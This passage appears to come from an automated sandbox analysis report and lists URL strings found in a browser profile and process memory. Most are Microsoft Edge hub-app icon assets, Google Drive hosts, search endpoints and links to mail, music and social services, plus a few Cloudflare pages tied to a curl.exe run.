Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive.google.com/
Source: Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log6.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log6.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log6.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log4.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr, HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log6.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr, HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log6.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://gaana.com/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://m.kugou.com/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://m.soundcloud.com/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://m.vk.com/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://music.amazon.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://music.apple.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://music.yandex.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://open.spotify.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: Session_13385853608423166.12.dr	String found in binary or memory: https://s28.q4cdn.com
Source: 000003.log.12.dr	String found in binary or memory: https://s28.q4cdn.com/
Source: Session_13385853608423166.12.dr, History.12.dr	String found in binary or memory: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
Source: History.12.dr	String found in binary or memory: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfThis
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://tidal.com/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://vibe.naver.com/today
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://web.telegram.org/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://web.whatsapp.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.dr	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.dr	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.deezer.com/
Source: content.js.12.dr, content_new.js.12.dr	String found in binary or memory: https://www.google.com/chrome
Source: Web Data.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.instagram.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.last.fm/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.messenger.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
